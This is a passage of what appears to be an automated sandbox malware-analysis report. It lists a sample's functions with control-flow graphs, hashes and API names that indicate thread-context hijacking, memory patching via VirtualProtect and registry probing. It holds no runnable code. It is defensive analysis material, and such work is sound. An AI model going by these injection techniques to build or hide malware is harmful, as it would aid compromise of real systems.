                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E31273190DB888FD72ADBB89846AEABFE1EF56321F04426FD049D3192DF646405C791
                                                                                                                                                                                                                                                Function 000002616F5928DC Relevance: .1, Instructions: 64COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 88873d5e8effef870f871fb690e3c29cc47414f70acfd919428cbb2d8d881e99
                                                                                                                                                                                                                                                • Instruction ID: 7f2807fb56c26457052148eb119a9d4293cf739ade85c4c5c37ba724a49560c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88873d5e8effef870f871fb690e3c29cc47414f70acfd919428cbb2d8d881e99
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AC21A23A7047848AE3288F16E84462EB7E9F786F84F598019DE8953B54DF35EC96CB00
                                                                                                                                                                                                                                                Function 000002616F5937A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                                                                • String ID: wr
                                                                                                                                                                                                                                                • API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: cb0c5075c893b5dd7e3d0210f51354234327389f8aeb8cdfcea730c70914034b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B11823D3017408AEF189B16F40D259666AF746B84F098425DE4D03B54EF3ED969C700
                                                                                                                                                                                                                                                Function 000002616F595B40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 6 2616f595b40-2616f595b67 7 2616f595b69-2616f595b78 6->7 8 2616f595b7b-2616f595b86 GetCurrentThreadId 6->8 7->8 9 2616f595b92-2616f595b99 8->9 10 2616f595b88-2616f595b8d 8->10 12 2616f595bab-2616f595bbf 9->12 13 2616f595b9b-2616f595ba6 call 2616f595970 9->13 11 2616f595fbf-2616f595fd6 call 2616f597950 10->11 15 2616f595bce-2616f595bd4 12->15 13->11 18 2616f595bda-2616f595be3 15->18 19 2616f595ca5-2616f595cc6 15->19 22 2616f595c2a-2616f595c9d call 2616f594520 call 2616f5944c0 call 2616f594480 18->22 23 2616f595be5-2616f595c28 call 2616f5a5090 18->23 24 2616f595ccc-2616f595cec GetThreadContext 19->24 25 2616f595e2f-2616f595e40 call 2616f5974cf 19->25 35 2616f595ca0 22->35 23->35 29 2616f595e2a 24->29 30 2616f595cf2-2616f595d13 24->30 38 2616f595e45-2616f595e4b 25->38 29->25 30->29 39 2616f595d19-2616f595d22 30->39 35->15 42 2616f595f0e-2616f595f1e 38->42 43 2616f595e51-2616f595ea8 VirtualProtect FlushInstructionCache 38->43 44 2616f595da2-2616f595db3 39->44 45 2616f595d24-2616f595d35 39->45 53 2616f595f2e-2616f595f3a call 2616f594e00 42->53 54 2616f595f20-2616f595f27 42->54 47 2616f595eaa-2616f595eb4 43->47 48 2616f595ed9-2616f595f09 call 2616f5978b8 43->48 49 2616f595e25 44->49 50 2616f595db5-2616f595dd3 44->50 51 2616f595d9d 45->51 52 2616f595d37-2616f595d4c 45->52 47->48 56 2616f595eb6-2616f595ed1 call 2616f5943a0 47->56 48->38 50->49 58 2616f595dd5-2616f595e1c call 2616f593910 50->58 51->49 52->51 59 2616f595d4e-2616f595d98 call 2616f593980 SetThreadContext 52->59 67 2616f595f3f-2616f595f45 53->67 54->53 60 2616f595f29 call 2616f5943f0 54->60 56->48 58->49 73 2616f595e20 call 2616f5974ed 58->73 59->51 60->53 71 2616f595f87-2616f595fa5 67->71 72 2616f595f47-2616f595f85 ResumeThread call 2616f5978b8 67->72 75 2616f595fb9 71->75 76 2616f595fa7-2616f595fb6 71->76 72->67 73->49 75->11 76->75
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1666949209-0
                                                                                                                                                                                                                                                • Opcode ID: 133b7329f7c35a0d3b30a0080c0b2471880c4eb6935a293058c2dd16a093a5c7
                                                                                                                                                                                                                                                • Instruction ID: fb73f922376a7326ac4d10486b12fd90b36b1e0cbd476e50f710b3bc3e85d364
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 133b7329f7c35a0d3b30a0080c0b2471880c4eb6935a293058c2dd16a093a5c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8D1ED7A204B8886DB74CB0AE49835AB7A5F3C9B85F548112EACD477A5DF3DD960CB00
                                                                                                                                                                                                                                                Function 000002616F5950E0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 246 2616f5950e0-2616f59510c 247 2616f59510e-2616f595116 246->247 248 2616f59511d-2616f595126 246->248 247->248 249 2616f595128-2616f595130 248->249 250 2616f595137-2616f595140 248->250 249->250 251 2616f595142-2616f59514a 250->251 252 2616f595151-2616f59515a 250->252 251->252 253 2616f59515c-2616f595161 252->253 254 2616f595166-2616f595171 GetCurrentThreadId 252->254 255 2616f5956e3-2616f5956ea 253->255 256 2616f59517d-2616f595184 254->256 257 2616f595173-2616f595178 254->257 258 2616f595191-2616f59519a 256->258 259 2616f595186-2616f59518c 256->259 257->255 260 2616f59519c-2616f5951a1 258->260 261 2616f5951a6-2616f5951b2 258->261 259->255 260->255 262 2616f5951de-2616f595235 call 2616f5956f0 * 2 261->262 263 2616f5951b4-2616f5951d9 261->263 268 2616f59524a-2616f595253 262->268 269 2616f595237-2616f59523e 262->269 263->255 272 2616f595265-2616f59526e 268->272 273 2616f595255-2616f595262 268->273 270 2616f595240 269->270 271 2616f595246 269->271 274 2616f5952c0-2616f5952c6 270->274 271->268 275 2616f5952b6-2616f5952ba 271->275 276 2616f595270-2616f595280 272->276 277 2616f595283-2616f5952a8 call 2616f59787c 272->277 273->272 278 2616f5952f5-2616f5952fb 274->278 279 2616f5952c8-2616f5952e4 call 2616f5943a0 274->279 275->274 276->277 287 2616f5952ae 277->287 288 2616f59533d-2616f595352 call 2616f593cd0 277->288 281 2616f5952fd-2616f59531c call 2616f5978b8 278->281 282 2616f595325-2616f595338 278->282 279->278 291 2616f5952e6-2616f5952ee 279->291 281->282 282->255 287->275 293 2616f595361-2616f59536a 288->293 294 2616f595354-2616f59535c 288->294 291->278 295 2616f59537c-2616f5953ca call 2616f5a5730 293->295 296 2616f59536c-2616f595379 293->296 294->275 299 2616f5953d2-2616f5953da 295->299 296->295 300 2616f5953e0-2616f5954cb call 2616f597450 299->300 301 2616f5954e7-2616f5954ef 299->301 312 2616f5954cd 300->312 313 2616f5954cf-2616f5954de call 2616f594070 300->313 303 2616f5954f1-2616f595504 call 2616f5945a0 301->303 304 2616f595533-2616f59553b 301->304 315 2616f595506 303->315 316 2616f595508-2616f595531 303->316 305 2616f59553d-2616f595545 304->305 306 2616f595547-2616f595556 304->306 305->306 309 2616f595564-2616f595571 305->309 310 2616f59555f 306->310 311 2616f595558 306->311 317 2616f595574-2616f5955c9 call 2616f5a5090 309->317 318 2616f595573 309->318 310->309 311->310 312->301 323 2616f5954e0 313->323 324 2616f5954e2 313->324 315->304 316->301 325 2616f5955cb-2616f5955d3 317->325 326 2616f5955d8-2616f595671 call 2616f594520 call 2616f594480 VirtualProtect 317->326 318->317 323->301 324->299 331 2616f595681-2616f5956e1 326->331 332 2616f595673-2616f595678 GetLastError 326->332 331->255 332->331
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2882836952-0
                                                                                                                                                                                                                                                • Opcode ID: 78c1719296444293cfe9d161745095a92cc6b1110c02aac1e2bc54111f1104d4
                                                                                                                                                                                                                                                • Instruction ID: 04437a66b0cc7a1f3a2d795bc8755508a8b19a4b2c9b439dc878d9df1905c882
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78c1719296444293cfe9d161745095a92cc6b1110c02aac1e2bc54111f1104d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DD020C36219BC48ADBA4CB59F49435AB7A5F3C5780F148015EA8E83BA9DF7DD864CF00
                                                                                                                                                                                                                                                Function 000002616F5939F0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Virtual$AllocQuery
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 31662377-0
                                                                                                                                                                                                                                                • Opcode ID: 583c9a696cbd2eed1741be8d9dfd6b22d02d31c25e0c094f16caf77a54ebc047
                                                                                                                                                                                                                                                • Instruction ID: 074052ddcf3e322968fe0f890455eba4881739eb596db4e34e47804b1cf84811
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 583c9a696cbd2eed1741be8d9dfd6b22d02d31c25e0c094f16caf77a54ebc047
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28317535219AC4C9EB38DB14E05931FA7AEF389784F188525F5CD46BA9DF3ED9608B00
                                                                                                                                                                                                                                                Function 000002616F5932A0 Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1683269324-0
                                                                                                                                                                                                                                                • Opcode ID: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction ID: 178e3c97e0c88a599720124179461fd81e95e4744776017db6c7a881b310848a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd13d599d4a1a9a129cf8228822ebf0962c6205abdf5c3edc3572841aa0737cc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2111A138710785CEF7689724E81E369229FA756705F4CC029984E85591EF3BEC79C610
                                                                                                                                                                                                                                                Function 000002616F594E00 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3733156554-0
                                                                                                                                                                                                                                                • Opcode ID: 8c4f484bea12a3d66523bbd423a72893e5e07743302c2e8b21c11c7b51894e53
                                                                                                                                                                                                                                                • Instruction ID: 80a70d6d200a08a4e5f21bd9c99249f1bed1d0e22f7278694591139f554766e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c4f484bea12a3d66523bbd423a72893e5e07743302c2e8b21c11c7b51894e53
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E7F03A3A218B8485D674DB01F49874A6BA5F3C97D4F189112FA8D07B69CF3ADAA08B00
                                                                                                                                                                                                                                                Function 000002616F591AC4 Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: GetProcessHeap.KERNEL32 ref: 000002616F59163B
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: HeapAlloc.KERNEL32 ref: 000002616F59164A
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F5916BA
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F5916E7
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F591701
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F591721
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F59173C
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F59175C
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F591777
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F591797
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F5917B2
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F5917D2
                                                                                                                                                                                                                                                • Sleep.KERNEL32 ref: 000002616F591ADF
                                                                                                                                                                                                                                                • SleepEx.KERNELBASE ref: 000002616F591AE5
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F5917ED
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F59180D
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F591828
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F591848
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F591863
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegOpenKeyExW.ADVAPI32 ref: 000002616F591883
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F59189E
                                                                                                                                                                                                                                                  • Part of subcall function 000002616F591630: RegCloseKey.ADVAPI32 ref: 000002616F5918A8
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1534210851-0
                                                                                                                                                                                                                                                • Opcode ID: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction ID: aaf17f2f4e785b11d8e5fdf7bd1c16a192e499f62de4bcd1b2a4e382aa0c64b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96bbb6c5dfaa89c5ee4f9b47efdaf229a391d86e69f5c9ec07006103e4739bcd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D631217D3106A149FA589B23D55836923AFAB45BC4F1CD4218E0E876D6EF22EC718250
                                                                                                                                                                                                                                                Function 000002616F302750 Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 656 2616f302750-2616f3027b8 call 2616f3029e8 * 4 665 2616f3029c6 656->665 666 2616f3027be-2616f3027c1 656->666 668 2616f3029c8-2616f3029e4 665->668 666->665 667 2616f3027c7-2616f3027ca 666->667 667->665 669 2616f3027d0-2616f3027d3 667->669 669->665 670 2616f3027d9-2616f3027fa VirtualAlloc 669->670 670->665 671 2616f302800-2616f302820 670->671 672 2616f302822-2616f30284a 671->672 673 2616f30284c-2616f302853 671->673 672->672 672->673 674 2616f3028f3-2616f3028fa 673->674 675 2616f302859-2616f302866 673->675 676 2616f3029a6-2616f3029c4 674->676 677 2616f302900-2616f302915 674->677 675->674 678 2616f30286c-2616f30287e 675->678 676->668 677->676 679 2616f30291b 677->679 685 2616f3028de-2616f3028e6 678->685 686 2616f302880-2616f30288c 678->686 681 2616f302921-2616f302935 679->681 683 2616f302996-2616f3029a0 681->683 684 2616f302937-2616f302948 681->684 683->676 683->681 690 2616f302953-2616f302957 684->690 691 2616f30294a-2616f302951 684->691 685->678 688 2616f3028e8-2616f3028ed 685->688 687 2616f3028d9-2616f3028dc 686->687 687->685 694 2616f30288e-2616f302891 687->694 688->674 692 2616f302961-2616f302965 690->692 693 2616f302959-2616f30295f 690->693 695 2616f302984-2616f302994 691->695 698 2616f302977-2616f30297b 692->698 699 2616f302967-2616f302975 692->699 693->695 696 2616f302893-2616f3028b9 694->696 697 2616f3028bb-2616f3028cb 694->697 695->683 695->684 700 2616f3028ce-2616f3028d5 696->700 697->700 698->695 701 2616f30297d-2616f302980 698->701 699->695 700->687 701->695
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599175099.000002616F300000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002616F300000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f300000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                                                                                                                                • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction ID: 8dcda32693cec44d10b93e7bc14cdb444b14c52ce78ee02f9e407406ad529b9f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4E61027AB01690CBDB54CF15D608B2DB39BFB44BA4F5C8126DE1907788DA39E872C701
                                                                                                                                                                                                                                                Function 00007FFAAC564B1C Relevance: 1.4, APIs: 1, Instructions: 102COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1600102747.00007FFAAC560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC560000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_7ffaac560000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: ef78d05a1a386d499d6f0973f6eba25c3a10a4b4253765f99a22ecc7c6da5521
                                                                                                                                                                                                                                                • Instruction ID: ad26b0a7ef5ebc9a1a69fac44cbdea544a77c841b11f1489e845f52b9da6d8a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef78d05a1a386d499d6f0973f6eba25c3a10a4b4253765f99a22ecc7c6da5521
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2531F63090CA4D8FDB59DB68C845BE9BBF0EB56321F04426FD04DC35A2DB646416CB91

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 000002616F592B40 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                                                                                                                • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 2119608203-3850299575
                                                                                                                                                                                                                                                • Opcode ID: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction ID: 056892e84e4a12242d0f5ab80578cd90d79c088ab9e88410561f2c66772193c9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26544e6c5f0419fcfe813128afc281aff9572a7b63f13a5f121835e5e6e69d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F8B1D23A2107D08AEB5DCF26D4487A963AEFB46B84F1C901ADE0953B94DF36EC65C740
                                                                                                                                                                                                                                                Function 000002616F597D90 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: 15d017ccf61f7e346f9080347f19ca6b8822780c519427b1c971fa1776b54a9d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5831657A304B808AEB64DF64E8447ED7369F785744F48802ADB4E47B98DF39DA68C710
                                                                                                                                                                                                                                                Function 000002616F59D814 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.1599275104.000002616F590000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002616F590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.1599275104.000002616F5B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_2616f590000_r8k29DBraE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: 670c1ce31eea1e87310ed20d3bd7bcaf6a87406a30462cbd5bd646537ef9097d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C31B43A214F808ADB24CF24E8443EE73A9F78A794F544116EE9D43B59DF39C965CB00
                                                                                                                                                                                                                                                Function 000002616F597970 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
